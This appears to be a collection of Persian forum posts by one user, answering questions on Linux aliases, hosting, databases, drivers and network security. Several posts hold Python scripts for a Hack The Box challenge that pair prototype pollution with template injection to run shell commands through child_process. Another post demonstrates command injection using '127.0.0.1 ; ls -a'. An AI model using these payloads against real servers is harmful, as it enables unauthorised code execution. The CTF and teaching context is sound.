mmj-sys

سلام دوستان کامند alias یه چیزیه که مردم زیاد ازش استفاده نمی کنن یا شایدم میکنن من نمیدونم این کاند میاد و یک کلمه معادل دستورات شما قرار میده که هر وقت اون کلمه رو بزنین بجاش اون وارد بشه به صورت خودکار مثلا خیلی ها عادت دارن بجای ls میان ls -ltrha رو میگیرن و خب کار بدی نیست که همه اطلاعات دایرکتوری رو داشته باشیم alias میاد و یک ورودی رو میگیره و بایستی قالبش این شکلی باشه alias ls="ls -ltrh " الان که دارم مینویسم این کد بالا از راست به چپه نمیدونم چجوری درستش کنم شاید درست نشون داده بشه برا شما اما اگه نشد به بزرگی خودتون ببخشید بریم سر اصل مطلب این کامند میاد مث نام مستعار عمل میکنه اگه کد بالا رو بزنین و بعد ls خالی بگیرین میبینین فرق کرده حالا میتونید برا هر کامندی یا هر کلمه ای که دلتون میخواد alias بزنین و کاند جدید بسازید اگه این کارو انجام بدید متوجه این میشید که ماندگار نیست و با بستن ترمینال میره برای همین باید با توجه به shell تون که پیشفرض bash هست فایل رو ادیت کنید . Bash – ~/.bashrc ZSH – ~/.zshrc Fish – ~/.config/fish/config.fish با دستور nano ./bashrc یادتون باشه به هیچی دست نزنین فقط ته تهش یه خط جدید باز کنید و کامند هایی که میخواید و بزنید اینجوری هر وقت ترمینال باز بشه خودش اجرا میشه

گراب رو تو کدوم مسیر نصب کردی ؟؟

خب به این کار چه نیازی هست ؟؟ وقتی دامین رو در اختیار داری دیگه زمپ به چه کار میاد ؟؟ روی وی پس اس کافیه cpanel رو نصب کنی

سی پنل هر وبسایت مال سایت ارای دهنده خدمات هاستینگشه رو خود وبسایت نیست

بلاخره با اسکریپت زیر تونستم کارو تموم کنم یه زمانی میگفتن پایتون برای اکسپلویت نویسی عالیه ولی نمیفهمیدم چرا الان به معنای واقعی کلمه درک کردم اسکریپت نهایی import requests TARGET_URL = '[Hidden Content]' # make pollution r = requests.post(TARGET_URL+'/api/submit', json = {"artist.name":"Westaway", "__proto__.type": "Program", "__proto__.block": { "type": "Text", "line": "process.mainModule.require('child_process').execSync('cat flag2GSEN > static/js/main.js')" } }) print(r.status_code) print(r.text) فقط کافیه با کروم یا یه ریکویست ته اسکریپت رو به مسیر host:port/static/js/main.js بزنید و تهش فلگ خونده میشه و براتون به نمایش در میاد

مشکل در اینجا بود که من وقتی دستور رو میزدم رسپانسش توی هیچی نمیریختم import requests TARGET_URL = '[Hidden Content]' # make pollution r = requests.post(TARGET_URL+'/api/submit', json = {"artist.name":"Westaway", "__proto__.type": "Program", "__proto__.block": { "type": "Text", "line": "process.mainModule.require('child_process').execSync('ls > static/js/main.js')" } }) print(r.status_code) print(r.text) # اینجا میتونید یه ریکویست به اون صفحه و فایل دلخواه بزنید ولی من با کرون رفتم سریع تر بشه این الان به من فایلا رو نشون داد الان کافیه فایل فلگ رو بخونم

الان متوجه شدم که اسکریپت بالا برای handelbar بوده و سرور از کامپایلر pug استفاده میکنه و الان میتونم به سرور یه چیزی بفرستم ولی پاسخ : 200 {"response":"<span>Hello guestndefine, thank you for letting us know!</span>"} رو داریم اگه اکسپلویت من با اسکریپت زیر : import requests TARGET_URL = '[Hidden Content]' # make pollution r = requests.post(TARGET_URL+'/api/submit', json = {"artist.name":"Westaway", "__proto__.type": "Program", "__proto__.block": { "type": "Text", "line": "process.mainModule.require('child_process').execSync('ls')" } }) print(r.status_code) print(r.text) کار نمیکرد باید این پاسخ رو میداد 200 {"response":"<span>Hello guest, thank you for letting us know!</span>"} الان نمیدونم چرا کامندم ران نمیشه با اگرهم ران میشه نمیتونم وصل شم

سلام دوستان من امروز توی سایت hackthebox به یک مشکل برخوردم داستان از این قراره که یه سایت هست که فیلد داره و اون فیلد اسم مشخصی رو از ما میگیره یه ورودی رو به ادرس /api/submit پست میکنه که اگه ما یه بخش اضافه با جیسان بفستیم اون کد رو ران میکنه ادرس سایت چلنج رو باید خودتون از hathebox بگیرید چون متفاوته سورس رو هم میتونید دانلود کنید اما من وقتی دنبال این داستان رفتم به هر جایی سر زدم نشد که نشد حتی اسکریپت های خودشون هم که میگن کار کرده کار نمیکنه برا من و 404 میده import requests TARGET_URL = '[Hidden Content]' r = requests.post(TARGET_URL+'/api/submit', json = { "artist.name":"Gingell", "__proto__.type": "Program", "__proto__.body": [{ "type": "MustacheStatement", "path": 0, "params": [{ "type": "NumberLiteral", "value": "process.mainModule.require('child_process').execSync('cat flag* > static/js/main.js')" }], "loc": { "start": 0, "end": 0 } }] }) print(r.status_code) print(r.text) print(requests.get(TARGET_URL+'/static/main.js').text) لینک چلنج

داداش من خواستم کمکت کنم اما نفهمیدم داری چیکار میکنی چرا کاربر باید توی فیلد عدد رشته bot رو وارد کنه که در اون صورت هم نمیشه چون باید یک تاپل ارد کنه با مقدار که توی تابع اینپوت غیر ممکنه اگه منظورت توی دستور شرط متغیر bot نباید توی پرانتز و کوتیشن بزارید اونجوری میگید bot یک رشته هست در ضمن چرا باز bot ریختید توی جایزه ؟؟؟ کد درهمی بود معلوم نبود چی به چیه

تا جایی که من میدونم یک سرویس ویندوزی هستش

سلام دوستان من یه وب کم creative live motion دارم این رو از عهد بوق خریده بودم ینی زمانی که تازه ویندوز نود هشت درومده بود یه سی دی درایور داره که تست کردم فقط رو ویندوز اکس پی کار کرد الان میخوام رو ویندوز ده امتحانش کنم اما میگه نمی تونید رو این نصبش کنید و بسته میشه درایوراش هم نتونستم پیدا کنم برا ویندوز ده الان هیچ راهی وجود نداره که درایور های اکس پی رو به ویندوز ده منتقل کرد ؟؟؟

اگه تاحالا با اکسل کار کرده باشین میتونین جداول رو مثل یک فایل اکسل در نظر بگیرید من میام و اطلاعات سه نفر رو جمع میکنم و میخوام که فقط نام سن و جنسیت رو ذخیره کنم خب میام و سه سوتون به نام های اسم و سن و جنسیت تشکیل میدم بعد دونه دونه افراد رو توی ردیف ها قرار میدم و اضافه میکنم حالا یه تاپیک رو در نظر بگیر یه اسم داره یه متن داره تگ داره دسته بندی داره تمام این ها در دیتابیس ذخیره می شن دیتابیس های مختلف طرز ذخیره سازی ها مختلف کار میکنن که اکثرن با متن ها کار میکنن اما اگر قرار باشه عکس یا داده های غیر نوشتاری رو ذخیره کنین میتونید به صورت blob ذخیره کنین شون تمام این هایی که گفتم برای sql ها بود nosql ها ساختار این شکلی ندارن

نگاه کنید اول بگم که این کار که پیام خالی یا خارج از مسئله بدید کار اشتباهیه لطفا دیگه تکرار نشه نکته دوم اینه که دیگه دی داس حمله انچنانی محسوب نمیشه اف کردن سایت هم برای نیم ساعت هم باشه به درد نمیخوره و جدیدا با تکنولوژی انتی دی داس هم ایپی تون بلاک میشه هم اگر بلاک نشید cdn رو دیگه اکثر سایتا دارن بنابر این دنبال باگ ها بگردید بیشتر نتیجه میگیرید اینجوری هم به مودم خودتون اسیب میزنید

نگاه کنید پروتکل هایی که توسط وای فای پشتیبانی میشن اکثرا دارای باگ هایی هستم که به راحتی هک میشن اما خب تخصص خودشو میخواد و یکم صبر و حوصله و بزار کافی اما اینکه wps شما روشن باشه ssid هم بهشون بدید دیگه هک کردنش با گوشی موبایل بدون روت هم امکان پذیره بنده گوشی های اپل رو که تست میکردم وقتی گوشی روشن بود و صفحه فعالیت داشت و شما رمز هم زده بودید SSID نمایش داده میشد اما وقتی صفحه لاک میشد دیگه SSID مخفی میشد و هک کردن بدون SSID ممکن نیست

متوجه منظورتون نشدم ینی چی که میخواید بندازید روی ویندوز

نمیدونم راه دیگه ای نمیشناسم فکر کنم اوبونتو رو دوباره نصب کنید بهتر باشه

رات های زیادی برای ساخت رات وجود داره کار سختی هم نیست تو نت سرچ کنید فکر کنم تو نتایج انجمن هم دیده شه

اگه مشکلی هم باشه توی خبر ذکر شده لطفا لینک خبر رو قرار بدید شما خودتون میگید کیف پول رمزارز هیچ وقت نمیشه هکش کرد شما دارید میگید sha256 رو باز کردن حتی اگه این کارا رو بکنن نمی تونن گذشته رو تغییر بدن توی تمامی بلاک هایی که ساخته میشه ذکر میشه و این بلاکا تو هزاران ماینر و کامپیوتر هست کسی نمی تونه تمام کامپیوتر هارو تغییر بده

شما پسورد تون رو وارد کنید مهم نیست که چی میاد جاش فکر کنم برای امنیت هنگام وارد کردن کده که کسی به مانیتور نگاه نکنه وقتی وارد شل شدید اینو بزنید تا ران لول به دیفالت برگرده telinit 2

اولندش اگه در کسی این سطح از مهارت وجود داشته باشه خب بنده مشکلی ندارم که بعدش هم اگه نرمافزار های پیشفرض نصب بود چی ؟؟ پیدا کردن باگ شبکه تو ویندوز غیر ممکنه مگه اینکه خلافش ثابت شه بعد هم نرمافزار های روز مره زیاد کاری با شبکه داخلی ندارند باز هم میگم باید اسکن کنید شاید باز هم اسیب پذیری خاصی پیدا کنید در مورد عوض کردن سورس روتر شما جز کد های جاوااسکریپت چیزی ندارید کار خیلی خطرناکی هم نمیشه کرد

خیر شما فقط میتونید با nmap پورت اسکن کنید بستگی به سیستم عامل ها داره که اکثرن در سطح امنیتی بالایی قرار دارن شما جز شنود هیچکاری نمی تونید بکنید

به همین سادگی ها نیست فکر کنم بتونید ایپی های فعال رو از جدول arp مودم پیدا کنید با همین روش وقتی در شبکه هستید میونید از ابزار ethercap استفاده و پهنای باند رو شنود کنید اگه بخواید روی کلاینت ها شل بگیرید باید اسیب پذیری هارو کشف کنید

شما دارید شورت کات های روی دسکتاپ رو میگید اصلا پوشه هوم روی دسکتاپ نیست و ترش هم در هر جایی که موارد حذف شده باشن به صورت هایدن در بعضی سیستم عامل ها ایجاد میشه و اگر میخواید پوشه های پنهان رو ببینید باید از دستور sudo ls -a استفاده کنید

فکر کنید یه سیستم نوشتید که میاد یه ایپی تو صفحه میگیره و برا سرور میفرسته و پینگ میکنه اگر کامند پینگ اینجوری باشه "ping -c 10 " + ip خب الان داده ما در اخر وارد میشه و درنهایت تو سیستم عامل سرور اجرا میشه اگر من بیام در ارسال صحیح داده خیانت کنم و اینجوری ip بدم 127.0.0.1 && ls -a or 127.0.0.1 ; ls -a با استفاده && یا سمی کلون میتونیم تو شل تو همون خط یه دستور دیگه بدیم و اینجوری رشته ای که ما وارد کردیم "ping -c 10 " + ip ----> "ping -c 10 127.0.0.1 ; ls -a" اینجوری در سطح شل مامیتونیم دستور دومی هم ران کنیم و به نحوی رو سرور شل داریم

نگاه کنید فرقش در معماری پردازنده هست و این بیت ها مربوط به اصطلاح باس ها گفته میشه و شما باید اول به مفاهیم خیلی عمیق کامپیوتر ها پی ببرید تا بتونید با این زبان کار کنید و حرف دوم شما ویژوال استدیو به شما کمک میکنه راحت تر طراحی اپ هارو با اسمبلی رو انجام بدید در هر کتابی یا ویدیویی که شما ببینید تو قسمت اول از مفاهیم شروع میکنن پس شما هم از یک مرجع مشخص شروع کنید به یاد گرفتن